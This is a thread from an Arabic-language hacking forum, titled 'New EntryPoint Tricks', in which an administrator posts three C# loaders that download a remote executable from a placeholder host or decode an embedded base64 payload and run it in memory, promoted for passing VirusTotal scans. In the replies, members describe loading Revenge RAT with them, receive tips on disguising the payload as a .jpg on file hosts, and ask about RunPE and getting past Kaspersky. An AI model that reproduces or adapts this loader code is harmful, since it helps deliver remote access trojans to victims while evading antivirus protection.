New EntryPoint Tricks


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

الحالة
مغلق و غير مفتوح للمزيد من الردود.

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
حياكم الله ياشباب
بداية هنا موضوع للتطبيق على احد الطرق هنا
https://basharbachir.de/vb/index.php?threads/clean-virus-total.9/
النتيجة كلين فايروس توتال
هنا 3 اشكال مختلفين جديدين غير مطروحين حسب مااعرف لاشكال نقاط الادخال
ضع مكان
https://xxx.com/Client.exe
رابط الكلاينت الخاص بك


C#:
     static void Main(string[] args)
        {
            var aLoader = new AssemblyLoader();
            Method1("https://xxx.com/Client.exe", aLoader);
        }
        static void Method1(string remoteAssemblyUrl, AssemblyLoader aLoader){
            string[] arguments = { };
            aLoader.LoadFromRemoteHost(remoteAssemblyUrl, arguments);
        }

}
   public interface IAssemblyLoader
    {
        void LoadFromRemoteHost(string remoteAssemblyUrl, string[] arguments);
    }
    class AssemblyLoader : IAssemblyLoader
    {
        public void LoadFromRemoteHost(string remoteAssemblyUrl, string[] arguments)
        {
            var trustedLoadFromRemoteSourcesGrantSet = new PermissionSet(PermissionState.Unrestricted);
            var trustedLoadFromRemoteSourcesSetup = new AppDomainSetup
            {
                ApplicationBase = AppDomain.CurrentDomain.SetupInformation.ApplicationBase
            };
            var trustedRemoteLoadDomain = AppDomain.CreateDomain("Trusted Appdomain", null,
                trustedLoadFromRemoteSourcesSetup, trustedLoadFromRemoteSourcesGrantSet);
            trustedRemoteLoadDomain.ExecuteAssembly(remoteAssemblyUrl, arguments);
        }

    }
وهنا

C#:
 static void Main(string[] args)
        {
       var aLoader = new AssemblyLoader();
            Method2("https://xxx.com/Client.exe", aLoader);

        }
        static void Method2(string remoteAssemblyUrl, AssemblyLoader aLoader)
        {
            var methodName = "Main";
            var arguments = new string[] { };
            aLoader.LoadByUrl(remoteAssemblyUrl, methodName, arguments);
        }
}
   public interface IAssemblyLoader
    {
        void LoadByUrl(string assemblyUrl, string methodName, string[] arguments);
    }
    class AssemblyLoader : IAssemblyLoader
    {
        public void LoadByUrl(string assemblyUrl, string methodName, string[] arguments)
        {
            var assembly = Assembly.LoadFrom(assemblyUrl);

            foreach (var type in assembly.GetTypes())
            {
                foreach (var method in type.GetMethods())
                {
                    if (!method.Name.ToLower().Equals(methodName.ToLower())) continue;
                    var instance = Activator.CreateInstance(type);
                    method.Invoke(instance, new object[] { arguments });
                    return;
                }
            }
        }
    }
    
        }
او هنا ضع مكان
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ
قيم البيس64 الخاصة بكلانيتك

C#:
 static void Main(string[] args)
        {
            var aLoader = new AssemblyLoader();
            Method3("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ", aLoader);
        }
        static void Method3(string b64Assembly, AssemblyLoader aLoader)
        {
            var methodName = "Main";
            aLoader.Load(b64Assembly, methodName, null);
        }
        public static void Load(string b64Assembly, string methodName, string[] arguments)
        {
            var bytes = Convert.FromBase64String(b64Assembly);
            var assembly = Assembly.Load(bytes);
            foreach (var type in assembly.GetTypes())
            {
                foreach (var method in type.GetMethods())
                {
                    if (!method.Name.ToLower().Equals(methodName.ToLower())) continue;
                    var instance = Activator.CreateInstance(type);
                    method.Invoke(instance, new object[] { arguments });
                    return;
                }
            }
        }
 
التعديل الأخير:

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
ظهرت لي مشكلة اخ بشار
Error 1 'LoadByUr': cannot declare instance members in a static class
تم اصلاح الطرق الثلاثة اخي الحبيب
ارجع جرب وان طلع نفس المشكلة اخبرني ايش هو الكلاينت اللي بتستخدمه .
 
  • أعجبني
التفاعلات: Do.OV

Kredit

:: عضو جديد ::
29 أكتوبر 2018
8
13
0
I'm having this problem but can't figure out a solution
i tried uploading the client on upload.ee and uploadfiles.io
ps. this is method 1
ps2. the client is revenge rat
 

المرفقات

  • أعجبني
التفاعلات: BasharBachir

أبو خليل

مشارك
29 أكتوبر 2018
106
138
0
ما شاء الله عليك انك بارع
وعمل جميل جدا جدا قمة التمكين
اشكرا اخي بشير

دائما موفق ان شاء الله
 
  • أعجبني
التفاعلات: BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
I'm having this problem but can't figure out a solution
i tried uploading the client on upload.ee and uploadfiles.io
ps. this is method 1
ps2. the client is revenge rat
here is the solution brother
uploeed.ee is the problem
please watch the video and tell me the results
download please the source code here
 

المرفقات

  • 101.5 KB المشاهدات: 27
  • أعجبني
التفاعلات: KHALED DZ و Kredit

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
what about native server mr Bachar like nanocore !!
as i know brother , you can't load any native array by using any form of entry points forms
so the tricks here 'll not working with the native clients like nanocore
you'll need runpe in c++ for example
or you can use delphi also
we'll talk about native clients later
 
  • أعجبني
التفاعلات: KHALED DZ

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
ما شاء الله عليك انك بارع

وعمل جميل جدا جدا قمة التمكين

اشكرا اخي بشير

دائما موفق ان شاء الله

تسلم اخي الحبيب الاريب على كلامك الطيب
ان واجهت اي مشكلة بالموضوع هنا
شوف الفديو هنا
https://basharbachir.de/vb/index.php?threads/clean-virus-total.9/
والفديو اللي بالمشاركة هنا
https://basharbachir.de/vb/index.php?threads/new-entrypoint-tricks.7/post-69
لاشكر على واجب اخي،وان شاء الله القادم افضل ..​
 
  • أعجبني
التفاعلات: KHALED DZ

Kredit

:: عضو جديد ::
29 أكتوبر 2018
8
13
0
here is the solution brother
uploeed.ee is the problem
please watch the video and tell me the results
download please the source code here
thx brother upload.ee was the problem
and sorry for making you speak english again actually i speak arabic i just don't have arabic keyboard xD
good work you deserve the best, mr bashar
 
  • أعجبني
التفاعلات: KHALED DZ و BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
thx brother upload.ee was the problem
and sorry for making you speak english again actually i speak arabic i just don't have arabic keyboard xD
good work you deserve the best, mr bashar
:ROFLMAO::ROFLMAO::ROFLMAO:
ولايهمك اخي الحبيب ههه،مافي داعي للاعتذار اكتب باي لغة بتقدر تكتب فيها
شكرا على كلامك الطيب ..نورت المنتدى اخي.
 
  • أعجبني
التفاعلات: Kredit و KHALED DZ

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
اخي الحبيب الحل بالمشاركةالخاصة بي
العضو سال لانه صار معاه نفس مشكلتك وانا سويت فديو للحل وقلت من وين المشكلة
شوف الفديو حتى تعرف انو مركز الرفع هوة المشكلة
لهيك شوف الفديو ورح تعرف انو لازم تغير امتداد الملف ل jpg مثلا وترفعه مثلا هنا
https://up.top4top.net/index.php
شوف المشاركات بالموضوع حتى تفهم اكثر اخي الحبيب
 
  • أعجبني
التفاعلات: Kredit و KHALED DZ

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
اخ بشار في طريقة تخطي الكاسبر سكاي ؟
اهلا بك اخي الحبيب
اولا اسف لتوقف المنتدى "انا كنت موقفه"
ثانيا اسئلة كثيرة اجتني عن تخطي الحمايات عن طريق ملفات vbs or js
والان سؤالك انه تخطي الكاسبر بالاسمبلي التنفيذي ..
للاسف كل هدول بدهم وقت وتجارب مني ياشباب .وهون المشكلة .انه وقت مافيه ابدا
وعدت الاخ بقسم استفسارات الحماية انه ابحث عشان السكربتات والان اوعدك انه شوف حل للكاسبر "مش مجرب ابدا اي طريقة نزلتها على كاسبر ولاعلى غيره"
اللي بدي ياه منكم انكم تجربو التشفيرات او طرق الاختراق اللي منزلها من زمان "لان عالاغلب هاد اللي رح سويه انا" وبالكثير اعدل على وحدة منهم
لهيك عليكم انكم تجربو ووقت ماتشوفو انه اي طريقة اختراق انا منزلها نفعت ولاطريقة تشفير انا منزلها نفعت وقتها بس اشوف وقت اكيد رح ابحث بهالشي .
انتو تعرفوني اني صادق .كل الملفات اللي كانت عندي "كلها" نحذفت يعني الهارد صارت مساحته 0
وصرلي يومين برجع ملفاتي ..ان شاء الله يومين لسا برجع المهمين منهم وبفضى للمنتدى رح اخليه يتعبى مواضيع ان شاء الله .
للاسف جاءت مشكلة حذف الملفات مو بوقتها .بس الحمدلله على كل حال ..كله خير .
 

Matrix0

:: عضو ::
22 نوفمبر 2018
52
40
ويندوز
0
من زمان عن نقاط ادخل ههههههههههههههههههه
ماعاد في حدا يكتب نقاط ادخل
مبدع يابشار بيك من يوم يومك تحب الخير ^_^
الله يوفقكك.............
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.